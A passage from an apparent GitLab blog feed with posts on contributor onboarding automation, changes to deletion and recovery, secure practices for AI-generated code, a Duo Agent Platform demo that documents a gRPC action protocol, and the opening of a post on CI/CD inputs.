<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512803/qmfaymqhq3zgdcnm6a3j.png" alt="GitLab comment template"></p>
<h2>We eliminated the 5-minute wait time</h2>
<p>Our first iteration was a little slow.
After starting the onboarding process, contributors wondered what to do next while the scheduled
pipeline took up to 5 minutes to create their onboarding issue.
Five minutes feels like forever when you have the momentum to dive in.</p>
<p><a href="https://gitlab.com/Taucher2003">Niklas</a>, a member of our <a href="https://about.gitlab.com/community/core-team/">Core team </a>, built a solution.
He added <a href="https://gitlab.com/gitlab-org/gitlab/-/merge_requests/163094">webhook events for access requests</a>
and <a href="https://gitlab.com/gitlab-org/gitlab/-/merge_requests/142738">custom payload templates for webhooks</a>.</p>
<p>These features together allowed us to trigger a pipeline immediately instead of waiting for the schedule.
This reduces the time to roughly 40 seconds (the time it takes for the CI pipeline to run)
and generates the onboarding issue right away. It also saves thousands of wasted pipelines and compute minutes when no access requests actually need processing.</p>
<p>We set up a <a href="https://docs.gitlab.com/ci/triggers/#create-a-pipeline-trigger-token">pipeline trigger token</a>
and used this as the target for the webhook, passing the desired environment variables:</p>
<pre><code class="language-json">{
  &quot;ref&quot;: &quot;main&quot;,
  &quot;variables&quot;: {
    &quot;EXECUTE_ACCESS_REQUESTS&quot;: &quot;1&quot;,
    &quot;DRY_RUN&quot;: &quot;0&quot;,
    &quot;PIPELINE_NAME&quot;: &quot;Create onboarding issues&quot;,
    &quot;GROUP_ID&quot;: &quot;{{group_id}}&quot;,
    &quot;EVENT_NAME&quot;: &quot;{{event_name}}&quot;
  }
}
</code></pre>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512805/qom7hnqnwfcdzvria7dd.png" alt="Pipeline list"></p>
<h2>We automated follow-ups</h2>
<p>With an increasing volume of customers and community contributors onboarding to the GitLab community,
maintainers struggled to track which issues needed attention and some follow-up questions got lost.</p>
<p>We built automation leveraging webhooks and Ruby to label issues updated by community members.
This creates a clear signal of issue status for maintainers.</p>
<p><a href="https://gitlab.com/gitlab-org/ruby/gems/gitlab-triage">GitLab Triage</a>
automatically nudges idle onboarding issues to ensure we maintain contributor momentum.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512811/gkj3qaidjl1vv2dlu8ep.png" alt="Automated nudge for idle GitLab onboarding issues"></p>
<h2>We organized issue tracking with GLQL</h2>
<p>We built a <a href="https://docs.gitlab.com/user/glql/">GLQL view</a> to keep track of issues.
This GLQL table summarizes onboarding issues which need attention,
so maintainers can review and follow up with community members.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512804/hdduf0orntdfhkysheae.png" alt="GLQL view of issue tracking"></p>
<p>These GLQL views improved our overall triage <a href="https://handbook.gitlab.com/handbook/values/#efficiency">efficiency</a>.
It was so successful we ended up using this strategy within the <a href="https://about.gitlab.com/solutions/open-source/">GitLab for Open Source</a>
and <a href="https://about.gitlab.com/solutions/education/">GitLab for Education</a> programs, too.
With GLQL tables for support issues, these community programs lowered their response times by 75%.</p>
<h2>We made the README findable</h2>
<p>The <a href="https://gitlab.com/gitlab-community/">@gitlab-community group</a>
is the home for contributors on Gitlab.com.
We already had a <code>README.md</code> file explaining the community forks and onboarding process, but this file
lived in our meta project.
With our follow-up user study, we discovered this was a point of confusion for newcomers when their
onboarding issues were under a different project.</p>
<p>We used <a href="https://docs.gitlab.com/user/project/repository/mirror/">GitLab's project mirroring</a>
to solve this and mirrored the meta project to <code>gitlab-profile</code>.
This surfaced the existing README file at the group level, making it easier to discover.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512809/kbgdxyilza71kmj0aeqt.png" alt="GitLab project mirroiring"></p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512804/taosgn8vvgo8onszuwaf.png" alt="Group README"></p>
<h2>The results speak for themselves</h2>
<p>By dogfooding GitLab, we improved the stumbling blocks found in our research studies
and transformed the GitLab contributor journey.
We have grown the number of customers and community members contributing to GitLab,
adding features to the product, solving bugs, and adding to our CI/CD catalog.</p>
<p>Our onboarding process has increased the rate newcomers join the community, and our total number of
contributors on the community forks has doubled over the last 9 months.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512803/xagra4vfsrhbcwnzekmp.png" alt="Community forks growth chart"></p>
<p>We reduced the time it takes for newcomers to make their first contribution by connecting them
with maintainers faster and supporting them in getting started.
We use <a href="https://docs.gitlab.com/user/group/value_stream_analytics/">GitLab's value stream analytics</a>
to track our response rates.</p>
<ul>
<li>First response time from community maintainers is down to 46 minutes over the last 3 months</li>
<li>Average approval time for community forks access is down to 1 hour over the last 3 months</li>
</ul>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512812/jzksakrfdb22hooqemzh.png" alt="Value stream analytics timeline"></p>
<p>The 100% success rate of our 2025 user study confirmed these improvements for our first-time contributors.</p>
<h2>We invested time savings into contributor recognition</h2>
<p>Fixing these newcomer challenges allowed us more capacity to focus on better recognition of
contributors, incentivizing first-timers to keep coming back.
The result is <a href="https://contributors.gitlab.com/">contributors.gitlab.com</a>.
We built out a central hub for our contributors that features gamified leaderboards,
achievements, and rewards.
Contributors can see their impact, track progress, and grow in the community.</p>
<h2>Sharing what we learned</h2>
<p>These improvements work and are repeatable for other open source projects.
We are sharing our approach across communities and conferences so that other projects can consider using these tools to grow.</p>
<p>As more organizations learn the barriers to participation, we can create a more welcoming open source environment.
With these GitLab tools, we can offer a smoother experience for both contributors and maintainers.
We're committed to advancing this work and collaborating to remove barriers for open source projects everywhere.</p>
<h2>Start the conversation</h2>
<p>Want to learn more about growing your contributor community?
Email <code>contributors@gitlab.com</code> or <a href="https://gitlab.com/gitlab-org/developer-relations/contributor-success/team-task/-/issues">open an issue</a>
to start a discussion.
We're here to help build communities.</p>
]]></content>
        <author>
            <name>Lee Tickett</name>
            <uri>https://about.gitlab.com/blog/authors/lee-tickett</uri>
        </author>
        <author>
            <name>Daniel Murphy</name>
            <uri>https://about.gitlab.com/blog/authors/daniel-murphy</uri>
        </author>
        <published>2025-07-15T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Improving GitLab's deletion flow: What to expect in coming months]]></title>
        <id>https://about.gitlab.com/blog/improving-gitlab-deletion-flow-what-to-expect-in-coming-months/</id>
        <link href="https://about.gitlab.com/blog/improving-gitlab-deletion-flow-what-to-expect-in-coming-months/"/>
        <updated>2025-07-14T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>At GitLab, we're committed to continuously improving your experience across our platform. Today, we're excited to announce significant enhancements to our deletion flow for groups and projects. We are rolling out a series of improvements designed to protect your data, simplify recovery, and create a more intuitive experience across all pricing tiers.</p>
<h2>Why we're making these changes</h2>
<p>Our current deletion flow has some inconsistencies that can lead to frustrating experiences. Free tier users have had limited or no options for recovering accidentally deleted content, projects in personal namespaces haven't had the same protections as those in groups, and group namespace paths have remained locked after deletion, preventing immediate reuse.</p>
<p>We've heard your feedback, and we're addressing these pain points with a comprehensive redesign of our deletion flow that will be rolled out in multiple iterations.</p>
<h2>What has changed already</h2>
<p>Over the past quarter, we have implemented fundamental improvements to create a consistent deletion experience across all pricing tiers. These changes have eliminated the frustration of accidentally deleting important content with no recovery option.</p>
<ul>
<li><a href="https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/#deletion-protection-available-for-all-users"><strong>Pending deletion for all users</strong></a><strong>:</strong> All deleted projects and groups now enter a &quot;pending deletion&quot; state before being permanently deleted, regardless of their pricing tier.</li>
<li><a href="https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/#delayed-project-deletion-for-user-namespaces"><strong>Self-service recovery</strong></a><strong>:</strong> You can now restore your own content without contacting support, giving you more control and autonomy over your data.</li>
<li><a href="https://gitlab.com/gitlab-org/gitlab/-/issues/502234"><strong>Clear status indicators</strong></a><strong>:</strong> We have standardized how deletion status is displayed across the platform, making it immediately clear when content is pending deletion.</li>
<li><strong>Extended recovery window:</strong> On July 10, 2025, we increased the pending deletion period from 7 to 30 days on GitLab.com. This means you now have ample time to recover from accidental deletions.</li>
</ul>
<h2>What's coming next</h2>
<h3>Currently in development</h3>
<p>Building on the foundation established in our first iteration, we are further enhancing your deletion experience with two key improvements:</p>
<ul>
<li><a href="https://gitlab.com/groups/gitlab-org/-/epics/17372"><strong>Admin area consistency</strong></a><strong>:</strong> Deletions initiated from the Admin area will follow the same pending deletion process as deletions initiated directly from the group or project level, creating a unified experience across all access points.</li>
<li><a href="https://gitlab.com/gitlab-org/gitlab/-/issues/526081"><strong>Immediate path reuse</strong></a><strong>:</strong> When you delete a project or group, its namespace path will be automatically renamed, allowing you to immediately reuse the original path for new content. This will remove the waiting period currently required to reuse namespace paths.</li>
</ul>
<h3>Planned for future release</h3>
<p>The final phase will introduce a redesigned deletion experience that completes our vision for a modern, intuitive deletion system:</p>
<ul>
<li><strong>Centralized &quot;Trash&quot; interface:</strong> All your deleted content will be accessible in a dedicated &quot;Trash&quot; section, providing a familiar paradigm similar to what you're used to in other applications.</li>
<li><a href="https://gitlab.com/gitlab-org/gitlab/-/issues/541182"><strong>Clear action separation</strong></a><strong>:</strong> We will create a clear distinction between &quot;Delete&quot; (temporary, recoverable) and &quot;Delete Permanently&quot; (irrevocable) actions to prevent accidental data loss.</li>
<li><strong>Bulk management:</strong> You'll be able to restore or permanently delete multiple items at once, making cleanup and recovery more efficient.</li>
</ul>
<h2>How these changes benefit you</h2>
<p>These enhancements deliver several key benefits that will transform your experience with GitLab's deletion functionality.</p>
<ul>
<li>
<p><strong>Protection against data loss</strong> is provided through pending deletion and self-service recovery available across all tiers, giving you a safety net against accidental deletions. The <strong>consistent experience</strong> ensures the same deletion flow applies to all projects and groups, eliminating inconsistencies across the platform.</p>
</li>
<li>
<p>You'll gain <strong>greater control</strong> through enhanced visibility and management options for deleted content, with a familiar interface that makes recovery intuitive. <strong>Improved workflow</strong> efficiency will result from immediate path reuse and bulk management capabilities that streamline your content organization process.</p>
</li>
<li>
<p>Most importantly, you'll have <strong>peace of mind</strong> knowing that the extended 30-day recovery window ensures ample opportunity to recover important data, while the clear separation between temporary and permanent deletion actions prevents accidental data loss.</p>
</li>
</ul>
<h2>Your feedback matters</h2>
<p>As always, we value your input. Please leave feedback in <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/538165">the feedback issue</a>.</p>
]]></content>
        <author>
            <name>Christina Lohr</name>
            <uri>https://about.gitlab.com/blog/authors/christina-lohr</uri>
        </author>
        <published>2025-07-14T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[3 best practices for building software in the era of LLMs]]></title>
        <id>https://about.gitlab.com/blog/3-best-practices-for-building-software-in-the-era-of-llms/</id>
        <link href="https://about.gitlab.com/blog/3-best-practices-for-building-software-in-the-era-of-llms/"/>
        <updated>2025-07-10T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>AI has rapidly become a core part of modern software development. Not only is it helping developers code faster than ever, but it’s also automating low-level tasks like writing test cases or summarizing documentation. According to our <a href="https://about.gitlab.com/developer-survey/">2024 Global DevSecOps Survey</a>, 81% of developers are already using AI in their workflows or plan to in the next two years.</p>
<p>As code is written with less manual effort, we’re seeing a subtle but important behavioral change: Developers are beginning to trust AI-generated code with less scrutiny. That confidence — understandable as it may be — can quietly introduce security risks, especially as the overall volume of code increases. Developers can’t be expected to stay on top of every vulnerability or exploit, which is why we need systems and safeguards that scale with them. AI tools are here to stay. So, as security professionals, it’s incumbent on you to empower developers to adopt them in a way that improves both speed and security.</p>
<p>Here are three practical ways to do that.</p>
<h2>Never trust, always verify</h2>
<p>As mentioned above, developers are beginning to trust AI-generated code more readily, especially when it looks clean and compiles without error. To combat this, adopt a zero-trust mindset. While we often talk about <a href="https://about.gitlab.com/blog/why-devops-and-zero-trust-go-together/">zero trust</a> in the context of identity and access management, the same principle can be applied here with a slightly different framing. Treat AI-generated code like input from a junior developer: helpful, but not production-ready without a proper review.</p>
<p>A developer should be able to explain what the code is doing and why it’s safe before it gets merged. Reviewing AI-generated code might even shape up to be an emerging skillset required in the world of software development. The developers who excel at this will be indispensable because they’ll marry the speed of LLMs with the risk reduction mindset to produce secure code, faster.</p>
<p>This is where tools like <a href="https://docs.gitlab.com/user/project/merge_requests/duo_in_merge_requests/">GitLab Duo Code Review</a> can help. As a feature of our AI companion across the software development lifecycle, it brings AI into the code review process, not to replace human judgment, but to enhance it. By surfacing questions, inconsistencies, and overlooked issues in the merge requests, AI can help developers keep up with the very AI that’s accelerating development cycles.</p>
<h2>Prompt for secure patterns</h2>
<p>Large language models (<a href="https://about.gitlab.com/blog/what-is-a-large-language-model-llm/">LLMs</a>)  are powerful, but only as precise as the prompts they’re given. That’s why prompt engineering is becoming a core part of working with AI tools. In the world of LLMs, your input <em>is</em> the interface. Developers who learn to write clear, security-aware prompts will play a key role in building safer software from the start.</p>
<p>For example, vague requests like “build a login form” often produce insecure or overly simplistic results. However, by including more context, such as “build a login form <strong>with</strong> input validation, rate limiting, and hashing, <strong>and</strong> support phishing-resistant authentication methods like passkeys,” you’re more likely to produce an output that meets the security standards of your organization.</p>
<p>Recent <a href="https://www.backslash.security/press-releases/backslash-security-reveals-in-new-research-that-gpt-4-1-other-popular-llms-generate-insecure-code-unless-explicitly-prompted">research</a> from Backlash Security backs this up. They found that secure prompting improved results across popular LLMs. When developers simply asked models to “write secure code,” success rates remained low. However, when prompts referenced <a href="https://cheatsheetseries.owasp.org/cheatsheets/LLM_Prompt_Injection_Prevention_Cheat_Sheet.html">OWASP best practices</a>, the rate of secure code generation increased.</p>
<p>Prompt engineering should be part of how we train and empower security champions within development teams. Just like we teach secure coding patterns and threat modeling, we should also be teaching developers how to guide AI tools with the same security mindset.</p>
<blockquote>
<p>Learn more with these helpful <a href="https://docs.gitlab.com/development/ai_features/prompt_engineering/">prompt engineering tips</a>.</p>
</blockquote>
<h2>Scan everything, no exceptions</h2>
<p>The rise of AI means we’re writing more code, quicker, with the same number of humans. That shift should change how we think about security, not just as a final check, but as an always-on safeguard woven into every aspect of the development process.</p>
<p>More code means a wider attack surface. And when that code is partially or fully generated, we can’t solely rely on secure coding practices or individual intuition to spot risks. That’s where automated scanning comes in. <a href="https://docs.gitlab.com/user/application_security/sast/">Static Application Security Testing (SAST)</a>, <a href="https://docs.gitlab.com/user/application_security/dependency_scanning/">Software Composition Analysis (SCA)</a>, and <a href="https://docs.gitlab.com/user/application_security/secret_detection/">Secret Detection</a> become critical controls to mitigate the risk of secret leaks, supply chain attacks, and weaknesses like SQL injections. With platforms like GitLab, <a href="https://about.gitlab.com/solutions/security-compliance/">application security</a> is natively built into the developer's workflow, making it a natural part of the development lifecycle. Scanners can also trace through the entire program to make sure new AI-generated code is secure <em>in the context of all the other code</em> — that can be hard to spot if you’re just looking at some new code in your IDE or in an AI-generated patch.</p>
<p>But it’s not just about scanning, it’s about keeping pace. If development teams are going to match the speed of AI-assisted development, they need scans that are fast, accurate, and built to scale. Accuracy especially matters. If scanners overwhelm developers with false positives, there’s a risk of losing trust in the system altogether.</p>
<p>The only way to move fast <em>and</em> stay secure is to make scanning non-negotiable.</p>
<p>Every commit. Every branch. No exceptions.</p>
<h2>Secure your AI-generated code with GitLab</h2>
<p>AI is changing the way we build software, but the fundamentals of secure software development still apply. Code still needs to be reviewed. Threats still need to be tested. And security still needs to be embedded in the way we work. At GitLab, that’s exactly what we’ve done.</p>
<p>As a developer platform, we’re not bolting security onto the workflow — we’re embedding it directly where developers already work: in the IDE, in merge requests, and in the pipeline. Scans run automatically and relevant security context is surfaced to facilitate faster remediation cycles. And, because it’s part of the same platform where developers build, test, and deploy software, there are fewer tools to juggle, less context switching, and a much smoother path to secure code.</p>
<p>AI features like <a href="https://about.gitlab.com/the-source/ai/understand-and-resolve-vulnerabilities-with-ai-powered-gitlab-duo/">Duo Vulnerability Explanation and Vulnerability Resolution</a> add another layer of speed and insight, helping developers understand risks and fix them faster, without breaking their flow.</p>
<p>AI isn’t a shortcut to security. But with the right practices — and a platform that meets developers where they are — it can absolutely be part of building software that’s fast, secure, and scalable.</p>
<blockquote>
<p>Start your <a href="https://about.gitlab.com/free-trial/">free 60-day trial of GitLab Ultimate with Duo Enterprise</a> and experience what it’s like to build secure software, faster. With native security scanning, AI-powered insights, and a seamless developer experience, GitLab helps you shift security left without slowing down.</p>
</blockquote>
]]></content>
        <author>
            <name>Salman Ladha</name>
            <uri>https://about.gitlab.com/blog/authors/salman-ladha</uri>
        </author>
        <published>2025-07-10T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Accelerate learning with GitLab Duo Agent Platform]]></title>
        <id>https://about.gitlab.com/blog/accelerate-learning-with-gitlab-duo-agent-platform/</id>
        <link href="https://about.gitlab.com/blog/accelerate-learning-with-gitlab-duo-agent-platform/"/>
        <updated>2025-07-07T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>At GitLab, we continue to expand our AI capabilities so I often find myself learning and working in new codebases. Whether I'm debugging issues, implementing new features, or onboarding to different projects, understanding system architecture quickly is crucial. But let's be honest — manually tracing through complex communication flows, especially gRPC connections, can eat up hours of productive development time.</p>
<p>This is exactly the type of tedious, yet necessary, work <a href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/">GitLab Duo Agent Platform</a> is designed to handle. Instead of replacing developers, it amplifies our capabilities by automating routine tasks so we can focus on creative problem solving and strategic technical work.</p>
<p>Let me show you how I used <a href="https://about.gitlab.com/gitlab-duo/agent-platform/">Duo Agent Platform</a> to generate comprehensive documentation for a Golang project's gRPC communication flow — and how it transformed hours of code analysis into a few minutes of guided interaction.</p>
<p>You can follow along with this video:</p>
<p>&lt;div style=&quot;padding:75% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1098569263?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;AI Agent Generates Complete gRPC Documentation in Minutes | GitLab Duo Agent Platform Demo&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>The challenge: Understanding gRPC communication flows</h2>
<p>I was working with a project called &quot;Duo Workflow Executor&quot; that communicates with a gRPC server. Rather than spending my afternoon manually tracing through the codebase to understand the communication patterns, I decided to let Duo Agent Platform handle the heavy lifting.</p>
<p>My goal was simple: generate a clear diagram showing how the gRPC communication works, including what payloads are received, what actions are executed, and what responses are sent back.</p>
<p>Working in VS Code with the GitLab Workflow extension installed, I opened the project and crafted a specific prompt for Duo Agent Platform:</p>
<p>&quot;Can you prepare a mermaid diagram that shows the gRPC connection between duo-workflow-service and this project. It should show what this project receives in gRPC payload, and what actions it executes based on the payload, and what it sends back. Study internal/services/runner/runner.go, especially the Run method, and write the mermaid output to a grpc.md file.&quot;</p>
<p>Duo Agent Platform didn't just blindly execute my request — it began intelligently gathering context to create a comprehensive execution plan. The platform automatically:</p>
<ul>
<li>Searched through relevant Go files in the project</li>
<li>Read the specific file I mentioned (runner.go)</li>
<li>Identified additional files that would provide necessary context</li>
<li>Analyzed the codebase structure to understand the gRPC implementation</li>
</ul>
<p>This contextual awareness is what sets agentic AI tools with great context apart from simple code generation tools. Instead of working in isolation, Duo Agent Platform understands the relationships between different components of your project.</p>
<h2>Collaborative refinement</h2>
<p>Rather than making assumptions, Duo Agent Platform is designed to keep a human in the loop at critical moments in task execution to deliver better results. In this scenario, the platform paused to ask clarifying questions about the level of detail I wanted.</p>
<p><strong>Agent:</strong> &quot;Should I include error handling details in the diagram?&quot;</p>
<p><strong>Me:</strong> &quot;Don't focus on error handling. Include all actions. Focus on gRPC payload.&quot;</p>
<p>This back-and-forth refinement is crucial. The agent isn't just executing commands — it's working with me to ensure the deliverable meets my specific requirements.</p>
<h2>Execution and results</h2>
<p>With the clarified requirements, Duo Agent Platform finalized its execution plan and requested confirmation before proceeding. I could have modified the approach at this stage, but the plan was perfectly aligned with what I needed.</p>
<p>The agent then executed each task in sequence, providing real-time progress updates. Within minutes, it had:</p>
<ul>
<li>Analyzed all relevant files across the project</li>
<li>Created comprehensive documentation with a detailed mermaid diagram</li>
<li>Saved everything to the requested grpc.md file</li>
<li>Included valuable context about outgoing payloads and connection management</li>
</ul>
<p>The resulting documentation wasn't just a basic diagram — it was thorough, accurate, and immediately useful for understanding the system architecture.</p>
<h2>Reviewing the output</h2>
<p>Here's the actual mermaid diagram that Duo Agent Platform created, showing the complete gRPC communication flow:</p>
<pre><code class="language-mermaid">sequenceDiagram
participant DWS as duo-workflow-service
participant DWE as duo-workflow-executor
participant Runner as ExecutionRunner
participant ActionExecutor as Action Executor
participant FileSystem as File System/Commands


Note over DWS, DWE: gRPC Bidirectional Streaming (ExecuteWorkflow)

%% Connection Establishment
DWE-&gt;&gt;DWS: gRPC Connection with Headers
Note over DWE, DWS: Headers: authorization (Bearer token)&lt;br/&gt;x-gitlab-authentication-type: oidc&lt;br/&gt;x-gitlab-realm, x-gitlab-global-user-id&lt;br/&gt;x-gitlab-oauth-token, x-gitlab-base-url&lt;br/&gt;x-gitlab-instance-id, x-request-id&lt;br/&gt;x-gitlab-namespace-id, x-gitlab-project-id


%% Workflow Start Request
DWE-&gt;&gt;DWS: ClientEvent{StartWorkflowRequest}
Note over DWE, DWS: StartWorkflowRequest:&lt;br/&gt;- ClientVersion&lt;br/&gt;- WorkflowDefinition&lt;br/&gt;- Goal&lt;br/&gt;- WorkflowID&lt;br/&gt;- WorkflowMetadata&lt;br/&gt;- ClientCapabilities[]


%% Action Processing Loop
loop Action Processing
    DWS-&gt;&gt;DWE: Action Message
    Note over DWS, DWE: Action Types:&lt;br/&gt;- Action_RunCommand {program, flags[], arguments[]}&lt;br/&gt;- Action_RunGitCommand {command, arguments[], repositoryUrl}&lt;br/&gt;- Action_RunReadFile {filepath}&lt;br/&gt;- Action_RunWriteFile {filepath, contents}&lt;br/&gt;- Action_RunEditFile {filepath, oldString, newString}&lt;br/&gt;- Action_RunHTTPRequest {method, path, body}&lt;br/&gt;- Action_ListDirectory {directory}&lt;br/&gt;- Action_FindFiles {namePattern}&lt;br/&gt;- Action_Grep {searchDirectory, pattern, caseInsensitive}&lt;br/&gt;- Action_NewCheckpoint {}&lt;br/&gt;- Action_RunMCPTool {}


    DWE-&gt;&gt;Runner: Receive Action
    Runner-&gt;&gt;Runner: processWorkflowActions()
    Runner-&gt;&gt;ActionExecutor: executeAction(ctx, action)
    
    alt Action_RunCommand
        ActionExecutor-&gt;&gt;FileSystem: Execute Shell Command
        Note over ActionExecutor, FileSystem: Executes: program + flags + arguments&lt;br/&gt;in basePath directory
        FileSystem--&gt;&gt;ActionExecutor: Command Output + Exit Code
    
    else Action_RunReadFile
        ActionExecutor-&gt;&gt;FileSystem: Read File
        Note over ActionExecutor, FileSystem: Check gitignore rules&lt;br/&gt;Read file contents
        FileSystem--&gt;&gt;ActionExecutor: File Contents
    
    else Action_RunWriteFile
        ActionExecutor-&gt;&gt;FileSystem: Write File
        Note over ActionExecutor, FileSystem: Check gitignore rules&lt;br/&gt;Create/overwrite file
        FileSystem--&gt;&gt;ActionExecutor: Success/Error Message
    
    else Action_RunEditFile
        ActionExecutor-&gt;&gt;FileSystem: Edit File
        Note over ActionExecutor, FileSystem: Read → Replace oldString with newString → Write&lt;br/&gt;Check gitignore rules
        FileSystem--&gt;&gt;ActionExecutor: Edit Result Message
    
    else Action_RunGitCommand
        ActionExecutor-&gt;&gt;FileSystem: Execute Git Command 
        Note over ActionExecutor, FileSystem: Git operations with authentication&lt;br/&gt;Uses provided git config
        FileSystem--&gt;&gt;ActionExecutor: Git Command Output
    
    else Action_RunHTTPRequest
        ActionExecutor-&gt;&gt;DWS: HTTP Request to GitLab API
        Note over ActionExecutor, DWS: Method: GET/POST/PUT/DELETE&lt;br/&gt;Path: API endpoint&lt;br/&gt;Body: Request payload&lt;br/&gt;Headers: Authorization
        DWS--&gt;&gt;ActionExecutor: HTTP Response
    
    else Action_ListDirectory
        ActionExecutor-&gt;&gt;FileSystem: List Directory Contents
        Note over ActionExecutor, FileSystem: Respect gitignore rules
        FileSystem--&gt;&gt;ActionExecutor: Directory Listing
    
    else Action_FindFiles
        ActionExecutor-&gt;&gt;FileSystem: Find Files by Pattern
        Note over ActionExecutor, FileSystem: Recursive search with name pattern&lt;br/&gt;Respect gitignore rules
        FileSystem--&gt;&gt;ActionExecutor: File Paths List
    
    else Action_Grep
        ActionExecutor-&gt;&gt;FileSystem: Search Text Pattern
        Note over ActionExecutor, FileSystem: Recursive text search&lt;br/&gt;Case sensitive/insensitive option
        FileSystem--&gt;&gt;ActionExecutor: Search Results
    
    else Action_NewCheckpoint/Action_RunMCPTool
        ActionExecutor-&gt;&gt;ActionExecutor: No-op Action
        Note over ActionExecutor: Returns empty success result
    end


    ActionExecutor--&gt;&gt;Runner: Action Result (string)
    
    alt Result Size Check
        Runner-&gt;&gt;Runner: Check if result &gt; 4MB
        Note over Runner: If result exceeds MaxMessageSize (4MB)&lt;br/&gt;Replace with error message about size limit
    end


    Runner-&gt;&gt;DWE: ActionResponse
    DWE-&gt;&gt;DWS: ClientEvent{ActionResponse}
    Note over DWE, DWS: ActionResponse:&lt;br/&gt;- RequestID (matches Action.RequestID)&lt;br/&gt;- Response (execution result string)
end


%% Workflow Completion
DWE-&gt;&gt;DWS: CloseSend()
Note over DWE, DWS: Signal end of workflow execution


%% Analytics and Cleanup
Runner-&gt;&gt;Runner: Send Analytics Event (Finish)
DWE-&gt;&gt;DWE: Token Revocation (if enabled)
DWE-&gt;&gt;DWS: Close gRPC Connection
</code></pre>
<p>This diagram reveals several important architectural insights that would have taken considerable time to extract manually:</p>
<ul>
<li><strong>Bidirectional communication:</strong> The workflow executor both initiates requests and responds to service actions.</li>
<li><strong>Rich payload structure:</strong> Each action type has specific parameters and expected responses.</li>
<li><strong>Multiple integration points:</strong> The executor interacts with local filesystem, Git repositories, and GitLab APIs.</li>
<li><strong>Comprehensive action set:</strong> Nine different action types handle everything from file operations to HTTP requests.</li>
<li><strong>Proper lifecycle management:</strong> Clear connection establishment and teardown patterns.</li>
</ul>
<p>What impressed me most was how the agent automatically included the detailed payload structures for each action type. This level of detail transforms the diagram from a high-level overview into actionable documentation that other developers can immediately use.</p>
<h2>Looking ahead</h2>
<p>This demonstration represents just one use case for GitLab Duo Agent Platform. The same contextual understanding and collaborative approach that made documentation generation seamless can be applied to:</p>
<ul>
<li><strong>Code reviews:</strong> Agents can analyze merge requests with full project context</li>
<li><strong>Testing:</strong> Generate comprehensive test suites based on actual usage patterns</li>
<li><strong>Debugging:</strong> Trace issues across multiple services and components</li>
<li><strong>Security scanning:</strong> Identify vulnerabilities with understanding of your specific architecture</li>
<li><strong>CI/CD optimization:</strong> Improve pipeline performance based on historical data</li>
</ul>
<p>GitLab Duo Agent Platform will enter public beta soon so <a href="https://about.gitlab.com/gitlab-duo/agent-platform/">join the wait list today</a>.</p>
<p>Stay tuned to the <a href="https://about.gitlab.com/blog/">GitLab Blog</a> and social channels for additional updates. GitLab Duo Agent Platform is evolving rapidly with specialized agents, custom workflows, and community-driven extensions on the roadmap.</p>
<h2>Learn more</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/agentic-ai-guides-and-resources/">Agentic AI guides and resources</a></li>
<li><a href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/">GitLab Duo Agent Platform: What’s next for intelligent DevSecOps</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/">What is agentic AI?</a></li>
<li><a href="https://about.gitlab.com/the-source/ai/from-vibe-coding-to-agentic-ai-a-roadmap-for-technical-leaders/">From vibe coding to agentic AI: A roadmap for technical leaders</a></li>
</ul>
]]></content>
        <author>
            <name>Halil Coban</name>
            <uri>https://about.gitlab.com/blog/authors/halil-coban</uri>
        </author>
        <published>2025-07-07T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[CI/CD inputs: Secure and preferred method to pass parameters to a pipeline]]></title>
        <id>https://about.gitlab.com/blog/ci-cd-inputs-secure-and-preferred-method-to-pass-parameters-to-a-pipeline/</id>
        <link href="https://about.gitlab.com/blog/ci-cd-inputs-secure-and-preferred-method-to-pass-parameters-to-a-pipeline/"/>
        <updated>2025-07-07T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>GitLab CI/CD inputs represent the future of pipeline parameter passing. As
a purpose-built feature designed specifically for typed parameters with
validation, clear contracts, and enhanced security, inputs solve the
fundamental challenges that teams have been working around with variables
for years.</p>
<p>While CI/CD variables have served as the traditional method for passing parameters to pipelines, they were originally designed for storing configuration settings — not as a sophisticated parameter-passing mechanism for complex workflows. This fundamental mismatch has created reliability issues, security concerns, and maintenance overhead that inputs elegantly eliminate.</p>
<p>This article demonstrates why CI/CD inputs should be your preferred approach for pipeline parameters. You'll discover how inputs provide type safety, prevent common pipeline failures, eliminate variable collision issues, and create more maintainable automation. You'll also see practical examples of inputs in action and how they solve real-world challenges, which we hope will encourage you to transition from variable-based workarounds to input-powered reliability.</p>
<h2>The hidden costs of variable-based parameter passing</h2>
<p>The problems with using variables for parameter passing are numerous and frustrating.</p>
<p><strong>No type validation</strong></p>
<p>Variables are strings. There is no type validation, meaning a pipeline expecting a boolean or a number, but accidentally receives a string. This leads to unexpected failures deep into the pipeline execution. In the case of a deployment workflow for example, hours after it was started  a critical production deployment fails because a boolean check in a variable was not passed as expected.</p>
